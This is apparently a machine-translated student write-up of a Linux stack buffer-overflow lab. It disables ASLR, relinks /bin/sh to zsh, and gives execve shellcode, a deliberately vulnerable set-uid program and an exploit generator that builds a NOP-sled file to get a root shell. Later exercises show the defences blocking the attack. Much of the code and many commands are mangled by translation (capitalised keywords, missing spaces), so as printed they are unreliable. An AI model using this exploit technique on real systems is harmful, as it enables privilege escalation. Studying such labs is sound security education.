Linux experiment--Buffer Overflow Vulnerability experiment

Linux experiment--Buffer Overflow Vulnerability experiment

20125121

First, the experimental description

A buffer overflow is a scenario in which a program attempts to write to a buffer beyond the pre-allocated fixed-length data. This vulnerability could be exploited by malicious users to alter the flow control of a program, or even execute arbitrary fragments of code. This vulnerability occurs because of a temporary shutdown of the data buffer and the return address, which causes the return address to be rewritten.

II. Preparation of the experiment

The lab building provides 64-bit Ubuntu Linux (System user name Shiyanlou, password Shiyanlou), and this experiment to facilitate the observation of the assembly statements, we need to operate in 32-bit environment, so before the experiment needs to do some preparation.

1. Enter a command to install something that compiles a 32-bit C program:

sudo apt-get update

Figure 1

sudo apt-get install lib32z1 libc6-dev-i386

Figure 2

sudo apt-get install Lib32readline-gplv2-dev

Figure 3

2, enter the command "linux32" into the 32-bit Linux environment, enter "/bin/bash" Use bash, exit Linux32 with exit

Figure 4

Third, the experimental steps

Practice One:

1 Initial Setup

In Ubuntu and some other Linux systems, the initial address of random heap (heap) and stack (stack) is randomized using address space, which makes it difficult to guess the exact memory address, and guessing the memory address is the key to the buffer overflow attack. So in this experiment, we use the following command to turn off this feature:

sudo sysctl-w kernel.randomize_va_space=0

Figure 5

In addition, in order to further protect against buffer overflow attacks and other attacks using shell programs, many shell programs automatically abandon their privileges when called. Therefore, even if you can trick a set-uid program into invoking a shell, you cannot maintain root privileges in the shell, which is implemented in/bin/bash.

In a Linux system,/bin/sh is actually a symbolic link to/bin/bash or/bin/dash. To reproduce the situation before this protective measure was implemented, we used another shell program (zsh) instead of/bin/bash. The following instructions describe how to set up the ZSH program:

sudo su

Cd/bin

RM SH

Ln-s zsh SH

Exit

Figure 6

2 Shellcode

In general, a buffer overflow can cause a program to crash, and in the program, the overflow data overwrites the return address. And if the data that overwrites the return address is another address, then the program jumps to that address, and if the address is a piece of well-designed code to implement other functions, this code is shellcode.

Observe the following code:

#include <stdio.h>

int main ()

{

Char *name[2];

Name[0] = "/bin/sh";

NAME[1] = NULL;

Execve (Name[0], name, NULL);

}

The shellcode of this experiment is the compiled version of the code just now:

\x31\xc0\x50\x68 "//sh" \x68 "/bin" \x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

3 Vulnerability Procedures

Save the following code as a "stack.c" file and save it to the/tmp directory. The code is as follows:

/* STACK.C */

/* This program has a buffer overflow vulnerability. */

/* Our task was to exploit this vulnerability */

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

int BOF (char *str)

{

Char buffer[12];

/* The following statement has a buffer overflow problem */

strcpy (buffer, str);

return 1;

}

int main (int argc, char **argv)

{

Char str[517];

FILE *badfile;

Badfile = fopen ("Badfile", "R");

Fread (str, sizeof (char), 517, badfile);

BOF (str);

printf ("returned properly\n");

return 1;

}

The code lets you know that the program reads a file named "Badfile" and loads the contents of the file into "buffer".

Compile the program, and set the Set-uid. The command is as follows:

sudo su

Gcc-m32-g-Z execstack-fno-stack-protector-o Stack stack.c

chmod U+s Stack

Exit

The GCC compiler has a stack protection mechanism to prevent buffer overflows, so we need to use –fno-stack-protector to close this mechanism when compiling the code. The-Z execstack is used to allow execution of the stack.

Figure 7

4 Attack Program

Our goal is to attack the vulnerability program just now and gain root access through the attack.

Save the following code as a "exploit.c" file and save it to the/tmp directory. The code is as follows:

/* EXPLOIT.C */

/* A program this creates a file containing code for launching shell*/

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

Char shellcode[]=

"\x31\xc0"//xorl%eax,%eax

"\x50"//PUSHL%eax

"\x68" "//sh"//PUSHL $0x68732f2f

"\x68" "/bin"//PUSHL $0x6e69622f

"\x89\xe3"//movl%esp,%ebx

"\x50"//PUSHL%eax

"\x53"//PUSHL%ebx

"\x89\xe1"//movl%esp,%ecx

"\x99"//CDQ

"\XB0\X0B"//movb $0x0b,%al

"\xcd\x80"//int $0x80

;

void Main (int argc, char **argv)

{

Char buffer[517];

FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */

memset (&buffer, 0x90, 517);

/* need to fill the buffer with appropriate contents here */

strcpy (buffer, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ X90\x?? \x?? \x?? \x?? ");

strcpy (Buffer+100,shellcode);

/* Save the contents to the file "badfile" */

Badfile = fopen ("./badfile", "w");

fwrite (buffer, 517, 1, badfile);

Fclose (Badfile);

}

Notice the above code, "\x??" \x?? \x?? \x?? " Need to add shellcode to the address stored in memory because the location can overwrite the return address just after an overflow occurs.

and strcpy (Buffer+100,shellcode); This sentence tells us again that Shellcode is stored in the buffer+100 position.

Now we're going to get shellcode in-memory address, enter the command:

GDB Stack

Disass Main

Results

Figure 8

The next steps:

Figure 9

Modify EXPLOIT.C file Now! Then, compile the EXPLOIT.C program:

Gcc-m32-o Exploit exploit.c

5 Attack results

Run the attack program exploit before running the vulnerability stack and observe the results:

Figure 10

Visible, through the attack, get the root permission!

Exercise two:

Through the command "sudo sysctl-w kernel.randomize_va_space=2" to open the system's address space randomization mechanism, repeatedly using the exploit program to attack the stack program, to see if the attack succeeds, can gain root privileges.

Figure 11

As you can see from the diagram, the attack failed without root access.

Exercise Three:

Re-point the/bin/sh to/bin/bash (or/bin/dash) to see if the attack succeeds and root privileges can be obtained.

Figure 12

As we know from the diagram, the attack failed without root access.

Iv. Summary of the experiment

1, in the experimental preparation stage, the use of the sudo command, you need to enter the password, no matter how input, no display on the screen. Later, after consulting the information, understand that the reason for not displaying any characters, because of the need for confidentiality, to prevent others based on the number of characters displayed to guess the password, although not display any characters, but in fact there is input, only need to enter the correct password in the press ENTER, you can complete the password input.

2. In the experimental phase, the address space is randomized to the initial address of the random heap (heap) and stack (stack), which makes it difficult to guess the exact memory address. Therefore, it is necessary to turn off the address randomization, fixed address, which makes the address guessing easier.

3. Many shell programs automatically abandon their privileges when they are called. Therefore, even if you can trick a set-uid program into invoking a shell, you cannot maintain root privileges in the shell, which is implemented in/bin/bash. To reproduce the situation before this protective measure was implemented, we used another shell program (zsh) instead of/bin/bash. This operation allows the program to remain privileged.

4, the attack program writes a badfile file, replaces some of these bytes with the previously computed bytes, when the vulnerability program reads the Badfile file, because there is no limit to the length of the input, resulting in the return value is overwritten by the previously replaced bytes, when the program returns, jumps to the pre-specified address, Root permission was obtained and the attack was completed.

5, practice two, because the address space randomization is turned on, resulting in the previously calculated address and the actual address is different, so that the attack can not be completed.

6, exercise three, the use of the Bash program, when the shell is running, there is no root authority, at this time, even if the attack program attacks the vulnerability program, also can not get root privileges.

7, the experiment let me understand the role of stack address and permissions, stack initial address randomization and discard root permissions for hackers to prevent the use of buffer overflow attacks have a very important role. On the other hand, we should pay attention to the processing of the buffer when we write the program, reduce the hacker attack way.

Linux experiment--Buffer Overflow Vulnerability experiment